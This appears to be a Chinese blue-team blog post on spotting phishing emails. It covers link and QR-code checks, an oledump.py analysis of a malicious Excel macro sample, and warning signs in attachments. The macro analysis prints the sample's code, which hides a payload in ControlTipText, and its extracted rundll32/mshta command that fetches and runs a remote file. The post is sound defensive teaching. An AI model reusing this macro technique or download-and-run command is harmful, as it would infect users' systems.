<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="识别钓鱼邮件0x00 初言钓鱼邮件手法基本如图所示  了解基本的钓鱼手法，那么我们开始分析检测吧！ 0x01 恶意链接这种钓鱼邮件基本上都是为了骗取内部员工的账号密码，但是也有一些链接是为了让内部人员下载恶意文件。 当邮件中带有链接的情况，如何知道链接是否属于恶意链接：  1.查看链接域名所属单位  2.把链接放到微步或其他安全社区查询  3.可以尝试把链接放到搜索引擎搜索  4.询问相关人员，询">
<meta property="og:type" content="article">
<meta property="og:title" content="识别钓鱼邮件">
<meta property="og:url" content="http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/index.html">
<meta property="og:site_name" content="ling">
<meta property="og:description" content="识别钓鱼邮件0x00 初言钓鱼邮件手法基本如图所示  了解基本的钓鱼手法，那么我们开始分析检测吧！ 0x01 恶意链接这种钓鱼邮件基本上都是为了骗取内部员工的账号密码，但是也有一些链接是为了让内部人员下载恶意文件。 当邮件中带有链接的情况，如何知道链接是否属于恶意链接：  1.查看链接域名所属单位  2.把链接放到微步或其他安全社区查询  3.可以尝试把链接放到搜索引擎搜索  4.询问相关人员，询">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/07/24/8m35HXlidWE4Ivh.png">
<meta property="og:image" content="https://s2.loli.net/2022/07/24/iMNRIO1vptoJV6S.png">
<meta property="og:image" content="https://s2.loli.net/2022/07/24/EhG8ikWncZuL7D5.png">
<meta property="og:image" content="https://s2.loli.net/2022/07/24/KHeuhSYidqQOX6b.png">
<meta property="og:image" content="https://s2.loli.net/2022/07/24/smhB2S7lgJupKFL.png">
<meta property="og:image" content="https://s2.loli.net/2022/07/24/EfAODel5cxbYnzB.png">
<meta property="og:image" content="https://s2.loli.net/2022/07/24/u8JnqhDpsIbYriU.png">
<meta property="article:published_time" content="2022-07-24T09:41:33.000Z">
<meta property="article:modified_time" content="2022-07-24T09:52:50.473Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="蓝队">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/07/24/8m35HXlidWE4Ivh.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>识别钓鱼邮件</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/projects_url">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2022/12/13/Jetty%E5%B8%B8%E8%A7%81%E5%88%A9%E7%94%A8%E6%96%B9%E5%BC%8F/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2022/02/25/%E7%83%9F%E9%9B%A8/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&text=识别钓鱼邮件"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&is_video=false&description=识别钓鱼邮件"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=识别钓鱼邮件&body=Check out this article: http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&name=识别钓鱼邮件&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&t=识别钓鱼邮件"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6"><span class="toc-number">1.</span> <span class="toc-text">识别钓鱼邮件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%88%9D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 初言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E6%81%B6%E6%84%8F%E9%93%BE%E6%8E%A5"><span class="toc-number">1.2.</span> <span class="toc-text">0x01 恶意链接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E4%BA%8C%E7%BB%B4%E7%A0%81"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 二维码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%AE%8F%E6%96%87%E4%BB%B6"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 宏文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E9%99%84%E4%BB%B6"><span class="toc-number">1.5.</span> <span class="toc-text">0x04 附件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E7%BB%88%E8%A8%80"><span class="toc-number">1.6.</span> <span class="toc-text">0x05 终言</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        识别钓鱼邮件
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-07-24T09:41:33.000Z" itemprop="datePublished">2022-07-24</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E8%93%9D%E9%98%9F/" rel="tag">蓝队</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="识别钓鱼邮件"><a href="#识别钓鱼邮件" class="headerlink" title="识别钓鱼邮件"></a>识别钓鱼邮件</h1><h2 id="0x00-初言"><a href="#0x00-初言" class="headerlink" title="0x00 初言"></a>0x00 初言</h2><p>钓鱼邮件手法基本如图所示</p>
<p><img src="https://s2.loli.net/2022/07/24/8m35HXlidWE4Ivh.png" alt="image-20220724170815021"></p>
<p>了解基本的钓鱼手法，那么我们开始分析检测吧！</p>
<h2 id="0x01-恶意链接"><a href="#0x01-恶意链接" class="headerlink" title="0x01 恶意链接"></a>0x01 恶意链接</h2><p>这种钓鱼邮件基本上都是为了骗取内部员工的账号密码，但是也有一些链接是为了让内部人员下载恶意文件。</p>
<p>当邮件中带有链接的情况，如何知道链接是否属于恶意链接：</p>
<p> 1.查看链接域名所属单位</p>
<p> 2.把链接放到微步或其他安全社区查询</p>
<p> 3.可以尝试把链接放到搜索引擎搜索</p>
<p> 4.询问相关人员，询问相关人员时，要防止骇客控制社交账号。最好是直接打电话询问！千万不要发邮件询问！！！</p>
<h2 id="0x02-二维码"><a href="#0x02-二维码" class="headerlink" title="0x02 二维码"></a>0x02 二维码</h2><p>当邮件中带有二维码时，可以先尝试使用手机中的扫一扫功能，这个扫一扫功只是扫二维码的内容。如果没有扫一扫功能，可以使用网上的在线二维码识别。</p>
<p>判断二维码是否属于恶意的情况，可以使用<code>恶意链接</code>的识别方式。</p>
<h2 id="0x03-宏文件"><a href="#0x03-宏文件" class="headerlink" title="0x03 宏文件"></a>0x03 宏文件</h2><p>通过宏文件钓鱼，这是攻击队常用的手段，而且该手段在钓鱼邮件中成功率很高。</p>
<p>当邮件附件中附带有office类型的表格时，需要额外注意。不要轻易打开该表格，打开之前可以使用脚本查看一下宏代码。</p>
<p>我这里使用DidierStevens的<code>oledump.py</code>查看宏代码。</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/DidierStevens/DidierStevensSuite">https://github.com/DidierStevens/DidierStevensSuite</a></p>
</blockquote>
<p>由于目前手上没有合适的样本，我在<code>any.run</code>上下载一个样本下来分析。</p>
<p>使用<code>oledump</code> vba解压<code>xls</code>表格</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 oledump.py ./SecuriteInfo.com.VBA.Logan.3458.21366.25107.xls -v</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/07/24/iMNRIO1vptoJV6S.png" alt="image-20220724154129786"></p>
<p>只有带有<code>m或M</code>标志才能使用<code>-s</code>参数显示</p>
<p>我这里查看<code>&#39;_VBA_PROJECT_CUR/VBA/ThisWorkbook&#39;</code>宏代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 oledump.py ./SecuriteInfo.com.VBA.Logan.3458.21366.25107.xls -s 8 -v</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/07/24/EhG8ikWncZuL7D5.png" alt="image-20220724154447676"></p>
<p>这里我们重点看到下面两句代码</p>
<p><code>lupatakamuchi = lol.lo.ControlTipText</code>将<code>lol.lo.ControlTipText</code>值赋值给<code>lupatakamuchi</code></p>
<p><code>GetObject(chod).Get(clean).Create lupatakamuchi, Null, Null, pid</code> 运行<code>lupatakamuchi </code>代码</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lupatakamuchi = lol.lo.ControlTipText</span><br><span class="line">::::::::::::::::::: <span class="built_in">GetObject</span>(chod).<span class="keyword">Get</span>(clean).Create lupatakamuchi, <span class="literal">Null</span>, <span class="literal">Null</span>, pid</span><br></pre></td></tr></table></figure>

<p>现在跟进进到<code>lupatakamuchi</code>代码</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 oledump.py ./SecuriteInfo.com.VBA.Logan<span class="number">.3458</span><span class="number">.21366</span><span class="number">.25107</span>.xls -s <span class="number">20</span> -d</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/07/24/KHeuhSYidqQOX6b.png" alt="image-20220724161214211"></p>
<p>现在我们提取攻击代码</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rundll32 SHELL32.DLL,ShellExec_RunDLL <span class="string">&quot;mshta&quot;</span> <span class="string">&quot;https://www.mediafire.com/file/wl6yiuw4vwpmfkk/14.htm/file&quot;</span></span><br></pre></td></tr></table></figure>

<p>现在我们明白了，该文档的宏是恶意的，是攻击队发送的钓鱼邮件。</p>
<p>我知道前面的脚本提取有些奇怪，因为我是先打开文档看过一遍才使用脚本的。所有有点奇怪！</p>
<p>接着我们使用手工查看宏代码</p>
<p>使用手工打开文档前，需要使用虚拟机。</p>
<p>使用<code>office</code>打开文档</p>
<p>快捷键<code>alt+F8</code>打开宏</p>
<p><img src="https://s2.loli.net/2022/07/24/smhB2S7lgJupKFL.png" alt="image-20220724161824339"></p>
<p>点击<code>编辑</code>，查看宏代码</p>
<p><img src="https://s2.loli.net/2022/07/24/EfAODel5cxbYnzB.png" alt="image-20220724161911282"></p>
<p>代码就不过多介绍了</p>
<p>跟进<code>lol.lo.ControlTipText</code></p>
<p><img src="https://s2.loli.net/2022/07/24/u8JnqhDpsIbYriU.png" alt="image-20220724162706078"></p>
<p><code>ControlTipText</code> 信息就是<code>恶意代码</code>了，隐藏恶意代码，这是攻击者经常用到的手段。</p>
<h2 id="0x04-附件"><a href="#0x04-附件" class="headerlink" title="0x04 附件"></a>0x04 附件</h2><p>由于平时正常发送的邮件也会经常附带附件，所以我们打开压缩包时需要额外注意。附件文件是什么类型！比如附件是<code>.exe</code>或者<code>.lnk</code>文件不是常规的<code>dox</code>或<code>pdf</code>形式。当然这不是说是<code>pdf</code>等文件格式就一定安全，具体问题具体分析。只是我们遇到<code>exe</code>等可执行文件风险更高！</p>
<p>至于如何失败恶意附件呢！</p>
<p> 1.电话联系发送邮件员工</p>
<p> 2.压缩包是否设置有密码</p>
<p> 3.查看压缩包是否存在自解压代码</p>
<p> 4.查看压缩包内的文件类型</p>
<h2 id="0x05-终言"><a href="#0x05-终言" class="headerlink" title="0x05 终言"></a>0x05 终言</h2><p>识别钓鱼邮件需要多个信息才能判断的，不是说是<code>exe</code>类型文件就一定是恶意，也不是说是<code>pdf</code>类型就一定是正常文件，还是需要多观察多联系相关人员才能下判断。</p>
<p>很多时候，钓鱼邮件都是依靠受害者交互才能完成攻击的，因此当我们发现有异样的邮件时，需要不怕麻烦的联系相关人员，而不是按照邮件内容操作！！！</p>
<p>当然我知道上面的方法不一定能百分百识别钓鱼邮件，而且识别钓鱼邮件方式还有一些我没讲到的，比如查询文件<code>md5</code>等，这些都是可以的。上述的方法不是唯一的，还有很多方法识别钓鱼邮件，我这里只是举一些简单的例子！</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/projects_url">项目</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6"><span class="toc-number">1.</span> <span class="toc-text">识别钓鱼邮件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%88%9D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 初言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E6%81%B6%E6%84%8F%E9%93%BE%E6%8E%A5"><span class="toc-number">1.2.</span> <span class="toc-text">0x01 恶意链接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E4%BA%8C%E7%BB%B4%E7%A0%81"><span class="toc-number">1.3.</span> <span class="toc-text">0x02 二维码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%AE%8F%E6%96%87%E4%BB%B6"><span class="toc-number">1.4.</span> <span class="toc-text">0x03 宏文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E9%99%84%E4%BB%B6"><span class="toc-number">1.5.</span> <span class="toc-text">0x04 附件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E7%BB%88%E8%A8%80"><span class="toc-number">1.6.</span> <span class="toc-text">0x05 终言</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&text=识别钓鱼邮件"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&is_video=false&description=识别钓鱼邮件"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=识别钓鱼邮件&body=Check out this article: http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&title=识别钓鱼邮件"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&name=识别钓鱼邮件&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/07/24/%E8%AF%86%E5%88%AB%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B6/&t=识别钓鱼邮件"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2025
    John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/projects_url">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
